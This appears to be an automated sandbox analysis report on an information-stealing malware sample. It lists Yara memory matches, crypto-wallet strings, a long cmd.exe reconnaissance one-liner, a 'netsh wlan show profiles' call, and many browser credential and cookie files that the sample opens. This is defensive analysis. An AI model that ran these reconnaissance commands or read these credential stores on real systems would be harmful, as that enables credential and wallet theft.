Source: Yara match File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\system_info.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Cookies.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\process_info.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Firefox\History.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\network_info.txt Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Electrum"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Jaxx"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Exodus"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Ethereum"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427288406.0000018B47B87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "keystore"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
